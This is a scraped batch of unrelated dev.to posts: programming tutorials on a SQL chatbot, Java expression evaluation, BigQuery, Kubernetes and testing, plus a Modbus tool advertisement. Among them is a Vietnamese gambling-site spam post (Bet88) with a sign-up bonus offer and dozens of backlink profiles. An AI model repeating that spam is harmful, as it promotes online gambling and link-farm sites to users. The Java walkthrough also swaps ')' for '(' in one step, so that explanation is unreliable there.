def query_fn(input_text, file):
db = process_file(file)
conversational_agent = create_sql_agent(
llm=llm,
db=db,
tools=[sql_tool],
memory=memory,
verbose=True,
dialect='ansi',
early_stopping_method="generate",
handle_parsing_errors=True,
)
response = conversational_agent.run(input=input_text)
# Check if the response is a list and contains valid data
if isinstance(response, list) and len(response) > 0:
# Convert each row of the result into a string
result_text = ', '.join([str(row) for row in response])
elif isinstance(response, str):
# If the response is a string, use it directly
result_text = response
else:
result_text = "No data found for the query."
return {"result": result_text}
# Set up the user interface with Gradio
iface = gr.Interface(
fn=query_fn,
inputs=[gr.Textbox(label="Enter your query"), gr.File(label="Upload Excel file")],
outputs=gr.JSON(label="Query Result"),
title="Domain-specific chatbot"
)
# Launch the application
iface.launch(share=False, server_port=8080)
```
- Create a file called "loader"
```bash
import pandas as pd
from sqlalchemy import create_engine, Table, Column, Integer, String, Date, MetaData
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from langchain_community.utilities import SQLDatabase
def create_demand_table(engine, table_name, excel_file):
# Read the Excel file
df = pd.read_excel(excel_file)
# Create a base class for the table model
Base = declarative_base()
metadata = MetaData()
# Map pandas data types to SQLAlchemy data types
dtype_mapping = {
'object': String,
'int64': Integer,
'float64': Integer,
'datetime64[ns]': Date,
}
# Dynamically define the table structure
columns = []
if 'ID' not in df.columns:
columns.append(Column('id', Integer, primary_key=True, autoincrement=True))
for col_name, dtype in df.dtypes.items():
col_type = dtype_mapping.get(str(dtype), String)
columns.append(Column(col_name, col_type))
# Dynamically create the table
demand_table = Table(table_name, metadata, *columns)
# Drop the existing table in the SQLite database, if it exists
metadata.drop_all(engine, [demand_table])
# Create the table in the SQLite database
metadata.create_all(engine)
# Create a session to interact with the database
Session = sessionmaker(bind=engine)
with Session() as session:
# Insert data into the table
df.to_sql(table_name, con=engine, if_exists='append', index=False)
db = SQLDatabase(engine)
return db
```
### Running the Application
To run the application use the following code.
```
python app.py
```
This command will start the server, and you can interact with the chatbot through the provided Gradio interface. In the console, you will see the URL where you can access your chatbot.

#### Gradio Interface
The generated interface consists of three parts:
- Query Input Box: This is where you enter your queries in natural language.
- File Upload Box: This is where you upload your Excel files.
- Result Display Area: This is where the results of your queries will be displayed.

#### Conclusion:
AI in chatbots enhances user interactions with personalized responses and advanced natural language understanding, ensuring more engaging and contextually relevant conversations.
| jhonnyarm |
1,917,856 | Bet88 - Link Truy Cập Nhà Cái BET88 Chính Thức - Uy Tín | Bet88 - Nhà cái cá cược trực tuyến an toàn⭐️đa dạng sản phẩm cá cược: Casino, Thể Thao ⭐️ Đăng ký... | 0 | 2024-07-09T22:23:24 | https://dev.to/bet88how/bet88-link-truy-cap-nha-cai-bet88-chinh-thuc-uy-tin-eob | Bet88 - Nhà cái cá cược trực tuyến an toàn⭐️đa dạng sản phẩm cá cược: Casino, Thể Thao ⭐️ Đăng ký ngay để nhận 199k miễn phí!
Địa chỉ: 235 Đồng Khởi, Phường Bến Nghé, Quận 1, TPHCM
SĐT: 093.222.9536
Email: bet88how@gmail.com
#bet88 #bet88how #bet88casino https://bet88.how/
https://www.spigotmc.org/members/bet88how.2069225/
https://gravatar.com/bet88how
https://www.diigo.com/profile/bet88how
https://influence.co/bet88how
https://disqus.com/by/disqus_tCHzEuXijn/about/
https://hub.docker.com/u/bet88how
https://sketchfab.com/bet88how
https://topsitenet.com/profile/bet88how/1225202/
https://www.slideserve.com/bet88how
http://freestyler.ws/user/463540/bet88how
https://ko-fi.com/bet88how
https://www.youtube.com/@bet88how
https://www.twitch.tv/bet88how/about
https://www.pinterest.com/bet88how/
https://github.com/bet88how
https://about.me/bet88how
https://x.com/bet88how
https://issuu.com/bet88how
https://www.instapaper.com/read/1692666375
https://www.linkedin.com/in/bet88how/
http://hawkee.com/profile/7260402/
https://www.openstreetmap.org/user/bet88how
https://soundcloud.com/bet88how
https://www.gta5-mods.com/users/bet88how
https://www.reddit.com/user/bet88how/
https://www.tumblr.com/bet88how
https://500px.com/p/bet88how?view=photos
https://batocomic.com/u/2092423-bet88howbet88how
https://wakelet.com/wake/Wf94AFc-lCwiSvETGOE1Y
https://ioby.org/users/bet88how858838
https://www.discogs.com/fr/user/bet88how
https://tvchrist.ning.com/profile/Bet88184
https://www.walkscore.com/people/170636775130/bet88how
https://my.archdaily.com/us/@bet88-55
https://hto.to/u/2092423-bet88howbet88how
https://wakelet.com/@bet88how
https://forum.acronis.com/user/679031
https://chart-studio.plotly.com/~bet88how
https://community.windy.com/user/bet88how
https://mangatoto.com/u/2092423-bet88howbet88how
https://pubhtml5.com/homepage/fnrwb/
https://audiomack.com/bet88how
https://pbase.com/bet88how/profile
https://mangatoto.net/u/2092423-bet88howbet88how
https://www.blogger.com/profile/14762074455554178367
https://www.mixcloud.com/bet88how/
https://www.ameba.jp/profile/general/bet88how/
https://mto.to/u/2092423-bet88howbet88how
https://dto.to/u/2092423-bet88howbet88how
https://www.pearltrees.com/bet88how
https://batotoo.com/u/2092423-bet88howbet88how
https://bet88how.blogspot.com/2024/07/bet88-link-truy-cap-nha-cai-bet88-chinh.html
https://original.misterpoll.com/users/5481135
https://www.plurk.com/bet88how
https://profile.hatena.ne.jp/bet88how/profile
https://www.reverbnation.com/artist/bet88how
https://tapas.io/bet88how
https://www.designspiration.com/bet88how/
http://banhkeo.sangnhuong.com/member.php?u=89777
https://tupalo.com/en/users/6996452
https://hashnode.com/@bet88how
https://comiko.net/u/2092423-bet88howbet88how
https://skitterphoto.com/photographers/102334/bet88how
https://www.fitday.com/fitness/forums/members/bet88how.html
https://bato.to/u/2092423-bet88howbet88how
https://www.speedrun.com/users/bet88how
https://www.longisland.com/profile/bet88how
https://zbato.org/u/2092423-bet88howbet88how
https://postheaven.net/hz0pk538os
https://start.me/p/qbM4ro/trang-b-t-d-u
https://writeablog.net/2o062qlz4o
https://readtoto.net/u/2092423-bet88howbet88how
https://newspicks.com/user/10461975
https://mangatoto.org/u/2092423-bet88howbet88how
https://allmylinks.com/bet88how
https://booklog.jp/users/bet88how/profile
https://taplink.cc/bet88how
https://www.anobii.com/en/016af771d644eb8f74/profile/activity
https://forums.alliedmods.net/member.php?u=377438
https://beacons.ai/bet88how
https://community.articulate.com/users/Bet88How
https://qiita.com/bet88how
https://www.credly.com/users/bet88how/badges
https://yoo.rs/@bet88how
https://heylink.me/bet88how/
https://myanimelist.net/profile/bet88how
https://leetcode.com/u/bet88how/
https://www.furaffinity.net/user/bet88how/
https://vocal.media/authors/bet88-link-truy-cap-nha-cai-be-t88-chinh-thuc-uy-tin
https://www.intensedebate.com/people/bet88howvn | bet88how | |
1,917,857 | Case Study: Evaluating Expressions | Stacks can be used to evaluate expressions. Stacks and queues have many applications. This section... | 0 | 2024-07-09T22:26:22 | https://dev.to/paulike/case-study-evaluating-expressions-1bgg | java, programming, learning, beginners | Stacks can be used to evaluate expressions. Stacks and queues have many applications. This section gives an application that uses stacks to evaluate expressions. You can enter an arithmetic expression from Google to evaluate the expression, as shown in Figure below.

How does Google evaluate an expression? This section presents a program that evaluates a _compound expression_ with multiple operators and parentheses (e.g., **(15 + 2) * 34 – 2**). For simplicity, assume that the operands are integers and the operators are of four types: **+**, **-**, *****, and **/**.
The problem can be solved using two stacks, named **operandStack** and **operatorStack**, for storing operands and operators, respectively. Operands and operators are pushed into the stacks before they are processed. When an _operator is processed_, it is popped from **operatorStack** and applied to the first two operands from **operandStack** (the two operands are popped from **operandStack**). The resultant value is pushed back to **operandStack**.
The algorithm proceeds in two phases:
## Phase 1: Scanning the expression
The program scans the expression from left to right to extract operands, operators, and the parentheses.
1. If the extracted item is an operand, push it to **operandStack**.
2. If the extracted item is a **+** or **-** operator, process all the operators at the top of **operatorStack** and push the extracted operator to **operatorStack**.
3. If the extracted item is a ***** or **/** operator, process the ***** or **/** operators at the top of **operatorStack** and push the extracted operator to **operatorStack**.
4. If the extracted item is a **(** symbol, push it to **operatorStack**.
5. If the extracted item is a **)** symbol, repeatedly process the operators from the top of **operatorStack** until seeing the **(** symbol on the stack.
## Phase 2: Clearing the stack
Repeatedly process the operators from the top of **operatorStack** until **operatorStack** is empty.
Table below shows how the algorithm is applied to evaluate the expression **(1 + 2) * 4 - 3**.

The code below gives the program, and Figure below shows some sample output.

```
package demo;
import java.util.Stack;
public class EvaluateExpression {
public static void main(String[] args) {
// Check number of arguments passed
if(args.length != 1) {
System.out.println("Usage: java EvaluateExpression \"expression\"");
System.exit(1);
}
try {
System.out.println(evaluateExpression(args[0]));
}
catch(Exception ex) {
System.out.println("Wrong expression: " + args[0]);
}
}
/** Evaluate an expression */
public static int evaluateExpression(String expression) {
// Create operandStack to store operands
Stack<Integer> operandStack = new Stack<>();
// Create operatorStack to store operators
Stack<Character> operatorStack = new Stack<>();
// Insert blanks around (, ), +, -, /, and *
expression = insertBlanks(expression);
// Extract operands and operators
String[] tokens = expression.split(" ");
// Phase 1: Scan tokens
for(String token: tokens) {
if(token.length() == 0) // Blank space
continue; // Back to the while loop to extract the next token
else if(token.charAt(0) == '+' || token.charAt(0) == '-') {
// Process all +, -, *, / in the top of the operator stack
while(!operatorStack.isEmpty() && (operatorStack.peek() == '+' || operatorStack.peek() == '-' || operatorStack.peek() == '*' || operatorStack.peek() == '/')) {
processAnOperator(operandStack, operatorStack);
}
// Push the + or - operator into the operator stack
operatorStack.push(token.charAt(0));
}
else if(token.charAt(0) == '*' || token.charAt(0) == '/') {
// Process all *, / in the top of the operator stack
while(!operatorStack.isEmpty() && (operatorStack.peek() == '*' || operatorStack.peek() == '/')) {
processAnOperator(operandStack, operatorStack);
}
// Push the * or / operator into the operator stack
operatorStack.push(token.charAt(0));
}
else if(token.trim().charAt(0) == '(') {
operatorStack.push('('); // Push '(' to stack
}
else if(token.trim().charAt(0) == ')') {
// Process all the operators in the stack until seeing '('
while(operatorStack.peek() != '(') {
processAnOperator(operandStack, operatorStack);
}
operatorStack.pop(); // Pop the '(' symbol from the stack
}
else {
// Push an operand to the stack
operandStack.push(Integer.valueOf(token));
}
}
// Phase 2: Process all the remaining operators in the stack
while(!operatorStack.isEmpty()) {
processAnOperator(operandStack, operatorStack);
}
// Return the result
return operandStack.pop();
}
/** Process one operator: Take an operator from operatorStack and apply it on the operands in the operandStack */
public static void processAnOperator(Stack<Integer> operandStack, Stack<Character> operatorStack) {
char op = operatorStack.pop();
int op1 = operandStack.pop();
int op2 = operandStack.pop();
if(op == '+')
operandStack.push(op2 + op1);
else if(op == '-')
operandStack.push(op2 - op1);
else if(op == '*')
operandStack.push(op2 * op1);
else if(op == '/')
operandStack.push(op2 / op1);
}
public static String insertBlanks(String s) {
String result = "";
for(int i = 0; i < s.length(); i++) {
if(s.charAt(i) == '(' || s.charAt(i) == ')' || s.charAt(i) == '+' || s.charAt(i) == '-' || s.charAt(i) == '*' || s.charAt(i) == '/')
result += " " + s.charAt(i) + " ";
else
result += s.charAt(i);
}
return result;
}
}
```
You can use the **GenericStack** class provided by the book or the **java.util.Stack** class defined in the Java API for creating stacks. This example uses the **java.util.Stack** class. The program will work if it is replaced by **GenericStack**.
The program takes an expression as a command-line argument in one string.
The **evaluateExpression** method creates two stacks, **operandStack** and **operatorStack** (lines 24, 27), and extracts operands, operators, and parentheses delimited by space (lines 30–33). The **insertBlanks** method is used to ensure that operands, operators, and parentheses are separated by at least one blank (line 30).
The program scans each token in the **for** loop (lines 36–72). If a token is empty, skip it (line 38). If a token is an operand, push it to **operandStack** (line 70). If a token is a **+** or **–** operator (line 39), process all the operators from the top of **operatorStack**, if any (lines 41–43), and push the newly scanned operator into the stack (line 46). If a token is a ***** or **/** operator (line 48), process all the ***** and **/** operators from the top of **operatorStack**, if any (lines 50–51), and push the newly scanned operator to the stack (line 55). If a token is a ( symbol (line 57), push it into **operatorStack**. If a token is a **)** symbol (line 60), process all the operators from the top of **operatorStack** until seeing the **)** symbol (lines 62–64) and pop the **)** symbol from the stack.
After all tokens are considered, the program processes the remaining operators in **operatorStack** (lines 75–77).
The **processAnOperator** method (lines 84–96) processes an operator. The method pops the operator from **operatorStack** (line 85) and pops two operands from **operandStack** (lines 86–87). Depending on the operator, the method performs an operation and pushes the result of the operation back to **operandStack** (lines 89, 91, 93, 95).
| paulike |
1,917,858 | Não deveria ser tão simples inserir um bug na sua aplicação e eu te conto o porquê | Quem nunca ouviu aquela história (fictícia ou não) do dev júnior que apagou a base de dados em... | 0 | 2024-07-09T22:33:58 | https://dev.to/ramonborges15/nao-deveria-ser-tao-simples-inserir-um-bug-na-sua-aplicacao-e-eu-te-conto-o-porque-902 | beginners, testing, career, developers | Quem nunca ouviu aquela história (fictícia ou não) do dev júnior que apagou a base de dados em produção? Ou quantos de nós ao implementar aquela nova melhoria, sem perceber inseriu um bug dentro da aplicação? Normalmente, a nossa primeira atitude é culpar ou a pessoa (quando ela comete o erro) ou a nós mesmos (quando nós cometemos o erro).
Inserir bug em um sistema ou mesmo apagar os dados de produção não deveriam ser tarefas tão simples de realizar (você deve concordar comigo, não é mesmo?). Mas porque isso acontece?
### Pessoas e Processos
Acredito que a resposta para esta pergunta inicia no entendimento de que **a maioria desses erros é primeiramente uma falha de processo e não de pessoas**. Observar as falhas a partir desse ponto de vista nos ajuda muito a encontrar a verdadeira causa do erro e evitá-las (ou pelo menos reduzí-las) no futuro.
No livro “A Startup Enxuta”, Eric Ries apresenta uma declaração bem interessante:
> *Se nosso processo de produção é tão frágil que você pode quebrá-lo logo no primeiro dia de trabalho, que vergonha por tornar isso tão fácil.*
>
Em outras palavras, **não deveria ser tão simples inserir um bug na minha aplicação!**
### Não chore o leite derramado, escreva testes!
Ok Ramon, eu entendi que não pode ser tão fácil. Porém, será que existe um meio pelo qual eu posso dificultar o meu “eu futuro” ou até um colega de cometer o mesmo erro? Sim! E uma das maneiras seria: **escrever testes para sua aplicação!**
O desejo e urgência para corrigir esse bug deve ser o mesmo para evitar que a próxima pessoa repetisse o erro. Ao inserirmos testes na aplicação, nós estamos de alguma forma protegendo o nosso trabalho bem como o dos nossos colegas também. Ou seja, **tornando o processo de inserir bugs mais difícil**.
Sempre que um novo bug é descoberto na aplicação, podemos criar um teste específico para detectá-lo. Dessa maneira, à medida que adicionamos mais testes, nosso sistema se torna progressivamente mais robusto e menos suscetível a erros. Percebeu que isso é muito mais produtivo que apenas criticar a pessoa ou até você mesmo?
## Conclusão
Enxergar os erros como oportunidades de melhoria no processo de desenvolvimento, nos permite identificar as causas reais e implementar soluções eficazes. A criação de testes é uma das estratégias poderosas para tornar o sistema mais robusto e resiliente a novos bugs, fortalecendo continuamente o processo de desenvolvimento de software.
## Referências
- Livro "A startup enxuta: Como usar a inovação contínua para criar negócios radicalmente bem-sucedidos" do Eric Ries. | ramonborges15 |
1,917,859 | Efficiency of Data Structure | Data structures are the fundamental components of computer programming, enabling efficient data... | 0 | 2024-07-10T04:16:45 | https://dev.to/brightpatani/data-structure-145a | Data structures are the fundamental components of computer programming, enabling efficient data organization, storage, and manipulation. Despite their importance, In this post, we will dive the world of data structures, their types, and their importance in programming.
**Data Structures vs. Data Types**
Many programmers struggle to understand the differences between data structures and data types. Data types define individual pieces of data, whereas data structures define how multiple values are organized and stored. This distinction is crucial, as it allows programmers to choose the appropriate data structure for their specific needs.
**Linear and Non-Linear Data Structures**
Linear data structures, such as arrays and linked lists, arrange elements sequentially. Non-linear data structures, like trees and graphs, don't follow a sequential arrangement. Each type has its strengths and weaknesses, making them suitable for different tasks.
**Arrays and Linked Lists**
Arrays store contiguous memory locations, enabling fast data processing. Linked lists, on the other hand, use pointers to connect nodes, allowing for easy insertion and deletion.
**Stacks and Queues**
Stacks follow the Last In First Out (LIFO) order, while queues follow the First In First Out (FIFO) order. These data structures are essential for managing data in a specific order.
**Trees and Graphs**
Trees are hierarchical data structures with nodes connected by edges. Graphs consist of vertices connected by edges, solving complex programming problems.
**Importance of Data Structures**
Data structures are essential for two main reasons: they make the code more efficient, and they make the code easier to understand. other importance include:
- Enable efficient data storage and retrieval
- Allow for scalable software development
- Provide a framework for solving complex problems
- Help programmers write more efficient and effective code | brightpatani | |
1,917,860 | Creating a Simple Generative AI Chatbot with Python and TensorFlow | Introduction: In this article, we'll walk through the process of creating a basic generative AI... | 0 | 2024-07-09T22:33:39 | https://dev.to/csar_fabinchvezlinar/creating-a-simple-generative-ai-chatbot-with-python-and-tensorflow-13mc | **Introduction:**
In this article, we'll walk through the process of creating a basic generative AI chatbot using Python and TensorFlow. This chatbot will be capable of generating responses based on input text, showcasing the fundamentals of natural language processing and neural networks.
Prerequisites:
Basic knowledge of Python
Familiarity with neural networks concepts
Python 3.7 or later installed
TensorFlow 2.x installed
**Step 1: Setting Up the Environment**
First, ensure you have the necessary libraries installed:

**Step 2: Preparing the Data**
We'll use a simple dataset for this example. Create a file named 'conversations.txt' with some sample dialogue:

**Step 3: Preprocessing the Data**
Now, let's preprocess our data:

**Step 4: Building the Model**
Let's create a simple sequence-to-sequence model:

**Step 5: Training the Model**
Now, let's train our model:

**Step 6: Using the Chatbot**
Finally, let's create a function to generate responses:

**Conclusion:**
This article demonstrates how to create a simple generative AI chatbot using Python and TensorFlow. While this example is basic, it provides a foundation for more complex chatbot implementations. Future improvements could include using larger datasets, implementing attention mechanisms, or exploring more advanced architectures like transformers.
Remember, creating **AI** models requires **ethical considerations** and responsible use. Always ensure your **chatbot** is designed to be helpful and not harmful. | csar_fabinchvezlinar | |
1,917,861 | BigQuery Schema Generation Made Easier with PyPI’s bigquery-schema-generator | When importing data into BigQuery, a crucial step is defining the table's structure - its schema.... | 0 | 2024-07-09T22:35:35 | https://dev.to/noela_tenku/bigquery-schema-generation-made-easier-with-pypis-bigquery-schema-generator-3iej | data, dataengineering, bigquery, python | When importing data into BigQuery, a crucial step is defining the table's structure - its schema. This schema can be auto-detected or defined manually.
### Auto-Detection with BigQuery’s LoadJobConfig Method (for Smaller Datasets)
When we load data from a CSV file, we use the LoadJobConfig method with the autodetect parameter set to True. This tells BigQuery's data importer (bq load) to peek at the first 500 records of your data to guess its schema. This works well for smaller datasets, especially if the data originates from a well-defined source like a pre-existing database.

### Manual Definition: Tedious for Large & Evolving Data
When dealing with data extracted from a service like a REST API, that might have thousands of records, or where older records may have different fields compared to newer ones, auto-detection falls short. Here, manually defining the schema becomes necessary. The traditional approach is to manually create a schema.json file.
Sure, you could skim through the JSON data, assuming you possess reading skills like Josh2funny ([Checkout the Nigerian comedian](https://youtu.be/k4szRq1R-08?si=xrMQ7sobeDuE723e&t=39)), and define the schema based on that. But wouldn't it be nice to have a more reliable approach?
### [PyPI’s bigquery-schema-generator](https://pypi.org/project/bigquery-schema-generator/)
This Python package is a lifesaver when it comes to generating BigQuery schemas. It works with newline-delimited data, whether it's in JSON, CSV format, or even a list of Python dictionaries and csv.DictReader objects. Unlike BigQuery's data importer, this package analyzes all your data to create a more accurate and error-free schema. Plus, it spares you the confusion that often arises with BigQuery's Repeated Mode and RECORD data type.
**Installation: Getting Started**
To install bigquery-schema-generator within your virtual environment, simply run:
`pip3 install bigquery-schema-generator`
**Usage**
The package offers various ways to integrate it into your workflow:
- Command Line: You can use it directly from the command line by running the included shell script, invoking the Python module, or using a Python script. The PyPI documentation provides all the details on these methods.
- As a Library : This is the method I used as indicated in the code below.

([Checkout the project](https://github.com/Noela-T/altschool-projects/tree/main/py_gcs_bq) I implemented with this tool.) | noela_tenku |
1,917,862 | AI Workforce Evolution: Emerging Roles and Future Perspectives | 1. Introduction The landscape of work and employment has been significantly reshaped by... | 27,673 | 2024-07-09T22:44:59 | https://dev.to/rapidinnovation/ai-workforce-evolution-emerging-roles-and-future-perspectives-433j | ## 1\. Introduction
The landscape of work and employment has been significantly reshaped by the
advent of artificial intelligence (AI). As technology continues to advance, AI
is becoming increasingly integral to various industries, driving efficiency,
innovation, and transformation. This evolution is not only changing how tasks
are performed but also creating a dynamic shift in the workforce landscape,
necessitating new skills and roles.
## 2\. Understanding Prompt Engineers
Prompt engineering is a burgeoning field that has gained prominence with the
rise of advanced AI models, particularly in natural language processing and
generation. Prompt engineers specialize in designing, testing, and refining
prompts to effectively interact with AI models to produce desired outcomes.
## 3\. Exploring AI Operations Managers
AI Operations Managers play a pivotal role in the integration and management
of AI within organizations. As companies increasingly adopt AI technologies,
the need for specialized roles to oversee these operations becomes crucial.
## 4\. Training and Education
Pursuing a career in AI requires a solid educational foundation typically
starting with a bachelor’s degree in computer science, data science,
mathematics, or a related field. Advanced degrees like a master's or Ph.D. can
be particularly beneficial for those looking to delve deeper into specialized
areas of AI.
## 5\. Industry Demand and Job Outlook
The industry demand and job outlook across various sectors can significantly
influence career choices, educational pursuits, and business strategies.
Understanding the current market trends and future projections is crucial for
stakeholders at all levels.
## 6\. Case Studies and Real-World Applications
Case studies and real-world applications are essential for understanding the
practical implications of theoretical research. They provide concrete examples
of how concepts and theories are implemented in real-world scenarios, offering
insights into their effectiveness, challenges, and impacts.
## 7\. Challenges and Solutions
Every business faces challenges, but the key to success lies in identifying
these challenges early and finding effective solutions. Common challenges
include technological changes, market competition, regulatory compliance, and
workforce management.
## 8\. Conclusion
The integration of artificial intelligence (AI) into various sectors is
reshaping the landscape of work and workforce development. The future of AI
workforce development looks promising, with a strong emphasis on continuous
learning and adaptability.
## 9\. References
When compiling a research paper, thesis, or any academic or professional
document, the inclusion of references is crucial. References provide the
foundation for your arguments, enhance the credibility of your work, and
acknowledge the contributions of others in the field.
📣📣Drive innovation with intelligent AI and secure blockchain technology! Check
out how we can help your business grow!
[Blockchain App Development](https://www.rapidinnovation.io/service-
development/blockchain-app-development-company-in-usa)
[Blockchain App Development](https://www.rapidinnovation.io/service-
development/blockchain-app-development-company-in-usa)
[AI Software Development](https://www.rapidinnovation.io/ai-software-
development-company-in-usa)
[AI Software Development](https://www.rapidinnovation.io/ai-software-
development-company-in-usa)
## URLs
* <https://www.rapidinnovation.io/post/rise-of-prompt-engineers-and-ai-managers-in-2024>
## Hashtags
#AIWorkforce
#PromptEngineering
#AIManagement
#AITraining
#FutureOfWork
| rapidinnovation | |
1,917,866 | An excellent Modbus slave (server) simulator and serial port debugging tool. | Main Features Download URL: Modbus Slave Emulator Supports various Modbus protocols,... | 0 | 2024-07-09T22:54:32 | https://dev.to/redisant/an-excellent-modbus-slave-server-simulator-and-serial-port-debugging-tool-c0a | modbus, slave, tooling, developer | ### Main Features
**Download URL: [Modbus Slave Emulator](https://www.redisant.com/mse)**
- Supports various Modbus protocols, including:
- Modbus RTU
- Modbus ASCII
- Modbus TCP/IP
- Modbus UDP/IP
- Modbus RTU Over TCP/IP
- Modbus RTU Over UDP/IP
- Monitors communication data on serial lines or Ethernet
- Supports up to 28 data formats, including: Signed, Unsigned, Hex, Binary, Long, Float, Double, etc.
- Switches between Modbus protocol addresses and PLC addresses
- Plots real-time charts for data in any number of registers, monitoring data trends
- Allows simultaneous creation of multiple network connections and numerous slave devices
- Managed through multiple tabs, enabling quick switching between slave devices
- Manages registers in a table format, supporting variable names and comments, as well as switching background and foreground colors
- Exports/Imports slave device register data to Excel
- Built-in byte conversion tool for converting Long, Float, Double type data to register data
- Supports a rich set of Modbus function codes:
- 01 (0x01) Read Coils
- 02 (0x02) Read Discrete Inputs
- 03 (0x03) Read Holding Registers
- 04 (0x04) Read Input Registers
- 05 (0x05) Write Single Coil
- 06 (0x06) Write Single Register
- 08 (0x08) Diagnostics (Serial only)
- 11 (0x0B) Get Communication Event Counter (Serial only)
- 15 (0x0F) Write Multiple Coils
- 16 (0x10) Write Multiple Registers
- 17 (0x11) Report Server ID (Serial only)
- 22 (0x16) Mask Write Register
- 23 (0x17) Read/Write Multiple Registers
- 43/14 (0x2B/0x0E) Read Device Identification
### Software Screenshots
**Quickly Create Multiple Connections and Multiple Slave Devices**
Modbus Slave Emulator supports various Modbus protocols (RTU, ASCII, TCP/IP, UDP/IP, RUT Over TCP, RUT Over UDP); you can create multiple connections simultaneously and add multiple slave devices to the network, quickly setting up your testing platform.

**Supports a Variety of Data Formats**
You can view and edit register data in multiple formats; supports up to 28 data formats, including: Signed, Unsigned, Hex, Binary, Long, Float, Double, etc.

**Byte Order Conversion Tool**
Quickly convert Long, Float, Double type data to register byte sequences using the convenient tool provided by Modbus Slave Emulator.

**Real-time Plotting**
Plot real-time charts for any number of registers, making data trends clear at a glance; supports X-Y axis zooming and image export.

**Monitor Communication Data**
Using Modbus Slave Emulator, you can monitor detailed communication data on serial lines or Ethernet, helping you quickly debug and troubleshoot issues.

**Easing Functions**
Modbus Slave Emulator comes with dozens of built-in easing functions to simulate changes in register values, providing a more realistic data simulation experience.

**Download URL: [Modbus Slave Emulator](https://www.redisant.com/mse)** | redisant |
1,917,879 | Day 0 - Beginning My Full-Stack Development Journey with JavaScript | Today marks the first step of my journey towards becoming a full-stack developer. Despite being in a... | 0 | 2024-07-09T23:29:33 | https://dev.to/ryoichihomma/day-1-beginning-my-full-stack-development-journey-with-javascript-2dld | Today marks the first step of my journey towards becoming a full-stack developer. Despite being in a non-tech role, I've decided to kick things off with the "JavaScript Essential Training" course on LinkedIn Learning.
### Why JavaScript?
Well, before diving headfirst into frameworks like React.js, I wanted to revisit and reinforce my skillsets in JavaScript. As someone passionate about building robust and dynamic web applications, mastering JavaScript is key to unlocking a world of possibilities in web development.
### Sharing Progress
My goal with this journey is not only to acquire technical knowledge but also to share my experiences and insights with you all. That's why I've committed to posting daily updates here on DEV, documenting my learnings, challenges, and the occasional "aha!" moments that come with mastering a new skill.
So, here's to Day 1 of many more to come! I'm excited about the road ahead and can't wait to see where this journey takes me. Stay tuned for tomorrow's update, where I'll dive deeper into JavaScript and share more of my coding adventures.
Happy coding!💻 | ryoichihomma | |
1,917,869 | Day 9 : Deploying Microservices on Kubernetes - Project Journey | Hey guys, it's Day 9 of my SRE and Cloud Security journey, and I'm pumped to share what I... | 0 | 2024-07-09T23:06:30 | https://dev.to/arbythecoder/day-9-deploying-microservices-on-kubernetes-project-journey-3c39 | microservices, kubernetes, devops, beginners | Hey guys, it's Day 9 of my SRE and Cloud Security journey, and I'm pumped to share what I accomplished today! I successfully deployed a three-microservice application on Kubernetes – it was definitely a challenge, but I tackled it head-on and learned a ton in the process. Let's just say, I had more than a few "oh, no, not again" moments, but I emerged victorious, and that's what matters!
I'm excited to share the challenges I faced, the solutions I implemented, and everything in between. Buckle up, because this journey is packed with valuable insights, and maybe even a few laughs along the way. I hope it inspires you as much as it inspired me to take on this project. Let's dive in!
**Project Structure:**
- **bookstore/**
- **deployments/** (deployment YAML files for each microservice)
- **services/** (service YAML files for each microservice)
- **ingress/** (`ingress.yaml` for external access)
- **README.md** (setup and deployment instructions)
**Setting Up the Kubernetes Cluster:**
- Installed Minikube (`minikube start`) for a local single-node cluster. It was like setting up a mini-city for my microservices!
- Verified cluster status with `kubectl cluster-info`. Just ensuring everything ran smoothly, like checking if the traffic lights were working in my Lagos city.
**Deploying Microservices:**
- Applied deployment YAML files (`kubectl apply -f deployments/<file>`) for each microservice. It was like sending my microservices to their new homes in the Kubernetes city.
- Defined and applied service YAML files (`kubectl apply -f services/<file>`) for internal and external access. Now my microservices could interact with each other and the outside world.
**Configuring Ingress:**
- Created and applied `ingress.yaml` to route external traffic using annotations and hostnames. This was like building a grand entrance to my microservices city, making it easy for visitors to find their way around.
**Challenges:**
- **Image Pull Issues:** Incorrect image names/tags led to `ImagePullBackOff` and `ErrImagePull` errors. It was like finding the right address in a city with confusing street signs.
- **Networking Configuration:** Connectivity problems between microservices due to incorrect service configurations. It was like trying to build a network of roads without a proper map.
- **Ingress Setup:** Difficulties exposing microservices externally due to incorrect Ingress configuration. It was like trying to build a grand entrance without knowing where the door should go.
**Solutions:**
- **Image Pull:** Verified image names/tags, corrected deployment files, and ensured images were available in the registry. I finally found the right street signs and made sure the addresses were correct.
- **Networking:** Updated service configurations with appropriate service types (ClusterIP, LoadBalancer). I got my hands on a proper map and built the roads correctly.
- **Ingress:** Configured Ingress with correct annotations, host definitions, and ensured the Ingress controller was properly set up. I finally found the right spot for the door and built a grand entrance that everyone could admire.
**Additional Challenge:**
- **Host File Modification:** Since I didn't have a domain name, I had to manually add the generated IP address of my Kubernetes cluster to the host file on my Windows machine. This involved opening the host file (`C:\Windows\System32\drivers\etc\hosts`) as administrator, adding the IP address and desired domain name, and saving the changes. It was like adding a new address to my own personal map to find my way to my microservices city.
**Conclusion:**
Day 9 involved deploying microservices on Kubernetes, overcoming image pull, networking, and Ingress configuration challenges. The host file modification was an additional step to access the cluster using a custom domain name. This project reinforced my understanding of Kubernetes deployments and the importance of thorough configuration and troubleshooting. I'm feeling pretty confident now, like I've got the map to my microservices city memorized! | arbythecoder |
1,917,871 | O que é e como usar o axios? | O que é? Axios é uma biblioteca de JavaScript que permite fazer requisições HTTP de... | 0 | 2024-07-09T23:11:03 | https://dev.to/nathanndos/o-que-e-e-como-usar-o-axios-3i3l | ## O que é?
Axios é uma biblioteca de JavaScript que permite fazer requisições HTTP de maneira simples e eficiente, em resumo é um cliente HTTP baseado em promises.
## Como instalar?
`yarn add axios`

| nathanndos | |
1,917,872 | Evoluindo sua estratégia de Testes para FileUpload com Spring Test e Amazon S3 | Em meu último artigo, discutimos como pode ser implementado um serviço de file upload utilizando... | 0 | 2024-07-10T11:15:01 | https://dev.to/jordihofc/evoluindo-sua-estrategia-de-testes-para-fileupload-com-spring-test-e-amazon-s3-22ap | testing, spring, aws, amazons3 | Em meu último artigo, discutimos como pode ser implementado um serviço de file upload utilizando Spring Boot e Amazon S3. Lá entendemos quais são as preocupações e ferramentas necessárias para permitir que você customize as regras de como gerenciar seus arquivos. Se você não leu ainda, recomendo que o faça, antes de ler este artigo.
